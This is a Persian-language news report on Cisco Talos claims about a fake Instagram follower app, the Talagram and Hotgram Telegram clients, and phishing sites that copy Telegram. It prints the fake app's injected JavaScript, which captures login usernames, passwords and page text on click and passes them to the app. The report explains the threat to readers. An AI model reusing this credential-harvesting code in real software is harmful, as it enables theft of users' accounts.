ادعای شرکت سیسکو درباره هاتگرام و طلاگرام/گزارش نهایی

به گزارش کارگروه امنیت سایبربان؛ برای طراحی برنامه (فالوئر بگیر اینستاگرام) از چارچوب نرم افزاری (iOS WebKit) استفاده شده است که در زمان ورود به آن، صفحه اولیه اینستاگرام را به شما نمایش می دهد. بر اساس گزارش منتشر شده توسط شرکت سیسکو، این صفحه ورود، جعلی بوده و برای حمله از نوع (injection)، با کدهای جاوا اسکریپت طراحی شده است. در ادامه، کد های این تزریق قابل مشاهده است:

document.addEventListener('click', function() { 
    try { 
        var tu = document.querySelector('[name="username"]'); 
        var tp = document.querySelector('[name="password"]'); 
        var tpV = (typeof tp == 'undefined') ? '' : tp.value; 
        var tuV = (typeof tu == 'undefined') ? '' : tu.value; 
    } catch (err) { 
        var tuV = ''; 
        var tpV = ''    } 
    var bd = document.getElementsByTagName('body')[0].innerText; 
    var messageToPost = { 
        'pu': tuV, 
        'pp': tpV, 
        'bd': bd 
    }; window.webkit.messageHandlers.buttonClicked.postMessage(messageToPost);}, false);

طبق گزارش شرکت تالوس، مهمترین اطلاعات کاربران در شبکه ها و رسانه های اجتماعی نام کاربری و گذرواژه است. این برنامه جعلی صفحه ای همانند برنامه اینستاگرام به کاربر نمایش می دهد و از طریق کد مخرب فوق، اطلاعات ورود شخص را سرقت می نماید. البته این شرکت امنیت سایبری به این موضوع اشاره نکرده است که اگر کاربر از امکان تایید هویت دو مرحله ای استفاده نماید، چه رویدادی رخ خواهد داد.

تلگرام طلایی یا طلاگرام

تلگرام طلایی یا طلاگرام نام برنامه هایی است که طبق گزارش شرکت امنیت سایبری تالوس، بدافزار هستند. طبق توضیحات منتشر شده مدیران این پیام رسان، طلاگرام مانند برنامه اصلی تلگرام از API های عمومی و آزاد تلگرام استفاده می کند و مستقیما به سرور اصلی تلگرام متصل می شود، ضمنا این برنامه در چارچوب قوانین کشور (ایران) فعالیت می کند.
در ادامه توضیحات این برنامه در وبگاه های مختلف مانند کافه بازار آمده است که از لحاظ امنیت تفاوتی بین تلگرام و تلگرام طلایی (طلگرام) وجود ندارد. شما به راحتی میتوانید در نرم افزار ثبت نام کنید و از امکانات نسخه اصلی تلگرام همراه با قابلیت های دیگر که نسخه طلایی در اختیار شما می گذارد استفاده کنید و هم اکنون می توانید آخرین ورژن این برنامه را دریافت و نصب کنید.  اما شرکت تالوس عقیده ای کاملا متفاوت دارد و معتقد است این برنامه یک بدافزار است.
البته به اعتقاد برخی کارشناسان، فعالیت این پیام رسان، تحت نظر نهادهای قانونی کشور، علت بدافزار اعلام شدن آنها از سوی تالوس است.

هاتگرام

در توضیحات مطرح شده توسط برخی وبگاه ها آمده است که هاتگرام (Hotgram)، یک نسخه غیر رسمی از پیام رسان تلگرام است که نه تنها از سایر نسخه های غیررسمی هیچ چیز کم ندارد، بلکه با ویژگی های داغی که دارد در نوع خود منحصر به فرد است. در هاتگرام امکان جستجو در محتوای تصویری، ویدئویی و متنی تمام کانال های تلگرام بدون اینکه در کانال ها عضو باشید وجود دارد و شما می توانید به تمام پست های داغ از تمام کانال ها بدون عضویت در کانال دسترسی داشته باشید.

علاوه بر این امکان مشاهده پرطرفدارترین و پربازدیدترین پست های تلگرام به تفکیک روز و هفته نیز در این برنامه وجود دارد. همچنین قادر هستید بدون عضویت در کانال ها، در بین تمام کانال های تلگرام جستجو انجام دهید و آن ها را دنبال کنید. در گزارش شرکت امنیت سایبری تالوس آمده که تلگرام طلایی و هاتگرام برای دور زدن قوانین داخلی ایران با بستری متفاوت و کنترل شده ارائه شده است. همچنین در بخش دیگری از این گزارش ادعا شده است که طبق تحقیقات تالوس هیچ سرور و دستگاه فیزیکی برای مدیریت این پیام رسان ها در ایران وجود ندارد و ترافیک موجود روی آنها به خارج از کشور منتقل می شود. به عبارتی دیگر در این برنامه ها فقط نظارت افزایش یافته و هیچ برتری خاصی، نسبت به تلگرام وجود ندارد.

وبگاه جعلی تلگرام

وبگاه هایی با آدرس های مختلف توسط مهاجمان طراحی شده که همانند نسخه دسکتاپ تلگرام هستند. بسیار از کاربران با بی دقتی و بدون توجه به نام دامنه این وبگاه ها اطلاعات خود را در درون آنها وارد می کنند که موجب می شود به آسانی اطلاعات آنها در اختیار هکرها قرار گیرد.